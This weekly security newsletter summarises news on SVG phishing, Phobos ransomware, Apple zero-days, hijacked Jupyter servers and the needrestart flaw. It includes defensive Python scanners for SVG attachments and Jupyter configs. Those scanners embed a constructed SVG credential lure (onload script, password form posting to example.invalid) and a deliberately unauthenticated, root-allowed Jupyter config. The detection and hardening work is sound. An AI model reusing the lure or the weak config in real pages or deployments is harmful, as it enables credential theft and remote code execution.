Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
SVG Attachments: The New Frontier in Phishing Attacks
Cybercriminals are attaching SVG files to phishing emails to slip past email filters that only look for the usual executable or Office payloads. Be cautious when receiving emails with unusual file attachments!
Key takeaways:
📈 Rising Trend: SVG attachments are becoming a common phishing vector, carrying either a fake login form or a script that fetches malware.
🖼️ SVG Exploitation: SVG is an XML text format, not a bitmap. It can embed HTML and JavaScript, so an attachment that looks like an image can render a credential-harvesting form or run a script when the recipient opens it in a browser.
🚫 Security Overlook: Because the payload is plain text inside something classified as a picture, attachment filters and signature-based scanners that treat SVG as a harmless image often let it through.
⚠️ User Caution: Unless an SVG attachment is expected, treat the email as highly suspicious.
🔍 Security Advice: Block or sandbox SVG attachments at the mail gateway where the business allows it, inspect the ones you do accept for script and embedded HTML, and educate users about this technique.
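The constructs that make an SVG attachment dangerous can be checked statically before anything renders it. The following is an added example written for this newsletter item, not code from the original article or from any vendor: it walks the SVG's XML tree and flags script elements, event-handler attributes, embedded HTML (the usual way a login form is drawn) and javascript:/data: links. The two sample SVGs are constructed for the demo; the benign one is a plain rectangle, the other has the shape of a credential lure.

```python
"""Static triage of an SVG mail attachment (added example, not from the article)."""
import re
import xml.etree.ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"

# Elements a plain picture never needs: script execution, embedded HTML
# (credential forms) and loaders for external or nested content.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
HTML_FORM_TAGS = {"form", "input", "button", "textarea"}


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script' (also strips xlink: etc.)."""
    return qname.rsplit("}", 1)[-1].lower()


def triage_svg(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing active was seen."""
    findings: list[str] = []
    try:
        # For untrusted input in production use defusedxml to block entity
        # expansion attacks; the stdlib parser is used here to stay dependency-free.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc}); quarantine rather than render"]

    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        # HTML inside <foreignObject> is how a phishing form gets drawn.
        if el.tag.startswith("{" + XHTML_NS + "}") and tag in HTML_FORM_TAGS:
            findings.append(f"HTML <{tag}> inside SVG (credential form?)")
        for attr, value in el.attrib.items():
            name = _local(attr)  # handles both href and xlink:href
            val = value.strip().lower()
            if name.startswith("on"):
                findings.append(f"event handler {name}= on <{tag}>")
            elif name == "href":
                if val.startswith("javascript:"):
                    findings.append(f"javascript: href on <{tag}>")
                elif val.startswith("data:text/html"):
                    findings.append(f"inline HTML data: URI on <{tag}>")
                elif re.match(r"https?://", val) and tag in {"image", "use", "a"}:
                    findings.append(f"external {tag} href -> {value}")
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(triage_svg(data))


# Constructed samples for the demo (not real phishing lures).
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
    b'<rect width="10" height="10" fill="red"/></svg>'
)

PHISH_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script>function init(){document.title="Invoice"}</script>
  <foreignObject width="320" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://example.invalid/collect">
      <input type="password" name="p"/>
    </form>
  </foreignObject>
  <a xlink:href="javascript:void(0)"><text y="20">Open document</text></a>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("phish", PHISH_SVG)):
        print(label, triage_svg(sample))
```

Run it on an attachment pulled from the mail store and quarantine anything that returns findings; a genuine logo or chart produces none. Treat the external-href rule as a policy choice rather than a verdict, since some legitimate SVGs do reference remote images.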
Extradition Leads to Charges Against Phobos Ransomware Admin
The U.S. has charged Evgenii Ptitsyn, a Russian national, for orchestrating Phobos ransomware attacks after his extradition from South Korea. His operations resulted in over $16 million in ransom payments from more than 1,000 victims.
Key takeaways:
🇺🇸 Extradition: Evgenii Ptitsyn, a Russian national, was extradited from South Korea to face U.S. charges for his role in Phobos ransomware operations.
💸 Financial Impact: The Phobos ransomware group extorted over $16 million from victims, primarily targeting U.S. entities.
🏥 Victim Profile: The ransomware attacks hit various sectors, including schools and hospitals, affecting over 1,000 victims.
🔒 Charges: Ptitsyn, also known as “derxan” and “zimmermanx,” faces charges related to conspiracy to commit wire fraud, damage to protected computers, and other cybercrimes.
🌐 International Cooperation: This case highlights the global effort to combat cybercrime through extradition and international legal cooperation.
U.S. Department of Justice (DoJ)
Apple Patches Critical Zero-Day Vulnerabilities in macOS
Apple has released urgent security updates for macOS Sequoia 15.1.1, iOS 18.1.1, and iPadOS 18.1.1 to fix two zero-day flaws that were exploited in attacks targeting Intel-based Macs.
Key takeaways:
🛡️ Apple addressed two zero-day vulnerabilities in its latest macOS, iOS, and iPadOS updates.
💻 The vulnerabilities, CVE-2024-44308 (JavaScriptCore) and CVE-2024-44309 (WebKit), are triggered by maliciously crafted web content: the first allows arbitrary code execution in the browser engine and the second a cross-site scripting attack through a cookie-management flaw. Apple says it is aware of exploitation against Intel-based Macs, but the fixes apply to every platform that ships WebKit.
⚠️ These flaws were actively exploited in the wild, making the updates critical for all users to install.
🔄 Both flaws were reported by Clément Lecigne and Benoît Sevens of Google’s Threat Analysis Group.
🆘 Users are urged to update their systems immediately to prevent potential security breaches.
Jupyter Notebooks Exploited for Illegal Sports Streaming
Hackers have found a new way to misuse technology – by hijacking unsecured Jupyter Notebooks to illegally stream sports events! This demonstrates the critical need for securing development environments.
Key takeaways:
🔒 Initial access is the exposed Jupyter server itself: a notebook or terminal reachable over the network with no token or password is remote code execution as the user running it, and because it is a legitimate interactive feature it needs no exploit.
📡 They use these notebooks to download and execute FFmpeg, a powerful multimedia framework, to capture and illegally restream sports events from sources like beIN Sports.
🎥 The attackers set up the streams to be broadcast on platforms like ustream.tv, a misuse of cloud compute for piracy; the same foothold gives access to everything else the notebook user can reach.
🔍 This incident underscores the importance of securing data science tools against unauthorized access and misuse.
🚨 Security recommendations: bind the server to localhost and reach it through SSH or an authenticated reverse proxy, keep token or password authentication enabled, patch regularly, and monitor Jupyter logs and outbound connections for unexpected activity.
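The weak and corrected settings side by side, as an added example written for this item rather than code from the original article or the Jupyter project. Jupyter Server configuration files are Python, so the audit parses them with `ast` instead of executing them, then flags the combination the campaign relied on: a server bound to every interface with token and password authentication switched off. The trait names (`ServerApp.ip`, `ServerApp.token`, `PasswordIdentityProvider.hashed_password`, `ServerApp.allow_root`) are real Jupyter Server options; the two config texts are constructed samples and the password hash is a placeholder.

```python
"""Audit a jupyter_server_config.py for exposure (added example, not Jupyter's own code)."""
import ast
from typing import Optional

LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def _attr_chain(node: ast.AST) -> Optional[str]:
    """Turn the target of `c.ServerApp.token = ...` into 'ServerApp.token'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name) and node.id == "c" and parts:
        return ".".join(reversed(parts))
    return None


def parse_config(text: str) -> dict:
    """Collect literal assignments to c.<App>.<trait>; non-literals become '<dynamic>'."""
    settings = {}
    for node in ast.walk(ast.parse(text)):
        if not isinstance(node, ast.Assign):
            continue
        for target in node.targets:
            key = _attr_chain(target)
            if key is None:
                continue
            try:
                settings[key] = ast.literal_eval(node.value)
            except ValueError:  # e.g. os.environ[...]; we do not evaluate code
                settings[key] = "<dynamic>"
    return settings


def _get(settings: dict, trait: str, default=None):
    # Jupyter Server uses ServerApp; the classic notebook used NotebookApp.
    for app in ("ServerApp", "NotebookApp"):
        if f"{app}.{trait}" in settings:
            return settings[f"{app}.{trait}"]
    return default


def audit(settings: dict) -> list[str]:
    findings = []
    ip = _get(settings, "ip", "localhost")       # Jupyter's default is localhost
    exposed = ip not in LOOPBACK                  # '', '*' and '0.0.0.0' bind everything
    if exposed:
        findings.append(f"listens on {ip!r}, reachable beyond this host")

    # An unset token means Jupyter generates a random one at start-up;
    # token = '' switches token authentication off entirely.
    token_off = _get(settings, "token", "<auto>") == ""
    has_password = bool(
        settings.get("PasswordIdentityProvider.hashed_password")
        or _get(settings, "password")             # older, deprecated trait
    )
    if token_off and not has_password:
        findings.append("no authentication: token disabled and no password hash set")
        if exposed:
            findings.append("anyone who can reach the port gets code execution as the server user")

    if _get(settings, "allow_root") is True:
        findings.append("allow_root=True: a hijacked kernel runs as root")
    if _get(settings, "allow_origin") == "*":
        findings.append("allow_origin='*': any website may drive the API cross-origin")
    if _get(settings, "disable_check_xsrf") is True:
        findings.append("XSRF protection disabled")
    return findings


# Constructed configs. WEAK is the shape of server the streaming campaign
# abused; HARDENED is the corrected version.
WEAK = """
c.ServerApp.ip = '0.0.0.0'
c.ServerApp.port = 8888
c.ServerApp.token = ''
c.ServerApp.password = ''
c.ServerApp.allow_root = True
c.ServerApp.open_browser = False
"""

HARDENED = """
c.ServerApp.ip = '127.0.0.1'   # reach it over an SSH tunnel or a TLS reverse proxy
c.ServerApp.port = 8888
# Hash produced by `jupyter server password`; the value here is a placeholder.
c.PasswordIdentityProvider.hashed_password = 'argon2:PLACEHOLDER_REPLACE_ME'
c.ServerApp.allow_root = False
c.ServerApp.open_browser = False
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(parse_config(cfg)))
```

Point `parse_config` at the file Jupyter reports from `jupyter server --show-config` or at `~/.jupyter/jupyter_server_config.py`; the weak sample yields four findings and the hardened one none. Anything assigned from code rather than a literal shows up as `<dynamic>` so it can be reviewed by hand.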
Ubuntu Linux Users at Risk from Old ‘Needrestart’ Vulnerability
A decade-old vulnerability in the ‘needrestart’ utility could allow attackers to escalate privileges to root. Ensure your systems are patched to prevent potential security breaches.
Key takeaways:
🚨 Critical Vulnerability: A set of flaws in the ‘needrestart’ utility, present since version 0.8 (April 2014), allows a local attacker to gain root. needrestart runs as root and inspects running processes to decide which interpreters need restarting, and an attacker can influence what it executes while doing so.
🕵️♂️ Privilege Escalation: Qualys disclosed five issues, CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224 and CVE-2024-11003. CVE-2024-48991 is the race condition; CVE-2024-48990 and CVE-2024-48992 make needrestart start Python or Ruby with a PYTHONPATH or RUBYLIB taken from the attacker’s own process environment. Each lets an unprivileged local user escalate to root.
🔧 Affected Systems: needrestart is installed by default on Ubuntu Server since 21.04, so any Ubuntu system running an unpatched copy is vulnerable.
🔄 Patch Available: The fix is needrestart 3.8, and Ubuntu has released updated packages. If you cannot update immediately, disable the interpreter heuristic by setting $nrconf{interpscan} = 0; in /etc/needrestart/needrestart.conf.
🔒 Security Measures: Update first, then keep up regular audits and monitoring of system activity for suspicious behaviour. Exploitation needs local access, so in practice it follows an earlier compromise of an unprivileged account.
Qualys Threat Research Unit (TRU)
Top Tips of the Week
Threat Intelligence
- Foster a culture of continuous improvement in threat intelligence. Regularly assess and enhance processes for optimal effectiveness.
- Stay informed on threat intelligence trends. Knowledge of emerging techniques empowers more effective threat detection.
- Implement threat intelligence sharing agreements with trusted partners. External collaboration strengthens overall CTI capabilities.
Threat Hunting
- Learn from historical incidents. Analyzing past events provides insights for improving threat intelligence and incident response.
- Monitor insider threats. Combine behavioral analytics with threat intelligence for a comprehensive approach.
- Monitor third-party risks in cyber threat hunting. Assess and manage cybersecurity risks associated with vendors and partners.
Custom Tooling
- Create custom tools with data integrity in mind. Implement measures to prevent data corruption and ensure accurate results.
Feature Video
Do you know what defensive capabilities your organization has? Do you know which team is doing what to combat threats? Do you have a way of coordinating your defensive efforts? Let me introduce you to the Courses of Action (CoA) matrix.
This key strategic planning tool will allow you to assess your defensive capabilities, provide security teams with situational awareness, and enable you to coordinate defensive efforts. It provides a structured framework to help you organize your tactical and procedural responses to cyber threats.
Learn about it in this video to assess how resilient your organization is against a cyber attack, help answer intelligence requirements, and drive critical thinking about defensive capabilities.
Let’s get started!
Learning Resources
OpenBAS: An Open-Source Breach and Attack Platform
OpenBAS is another awesome open-source project from the creators of OpenCTI. This community call video on OpenBAS covers its key features and functionalities for testing security controls.
It covers how OpenBAS works in synergy with other tools like OpenCTI and, through a practical walkthrough, how users simulate attack scenarios and assess their security posture in real time.
This is a fantastic platform that I highly recommend CTI analysts, threat hunters, and detection engineers check out!
Are Tiling Window Managers Worth It?
I recommend everyone in security (and technology) learn to use Linux. Part of that journey can include deciding if you should go full L33T nerd and start using a tiling window manager.
Should you use one or do you want to know more about them? Check out this video!
It explores the appeal and functionality of tiling window managers, how you can get started, and weighs up the pros and cons of using one.
Cloudflare Does Cloud Compute… Apparently
AWS, Azure, or GCP getting too expensive? Well, Cloudflare’s cloud compute might be the way to go. They offer surprisingly robust serverless hosting without upfront costs.
This great video explores how you can use Cloudflare’s hosting services to build scalable projects, with generous free tiers and integrated features, making Cloudflare an appealing choice for indie developers and startups alike.
Discover the pros and cons (potential vendor lock-in and limited language support) of using Cloudflare for cloud services.
NSA TAO Chief on Disrupting Nation State Hackers
This is one of my favorite presentations from the GOAT of cyber security memes, Rob Joyce.
Hear the former Chief of the NSA’s Tailored Access Operations (TAO) discuss how the agency exploits network vulnerabilities for foreign intelligence. Plus, how you can defend yourself by better knowing your network, proactively defending yourself, and applying best security practices to stay ahead of sophisticated threats.
A fantastic presentation you should watch to fully appreciate the axiom “to defend effectively, organizations must know their networks better than the attackers.”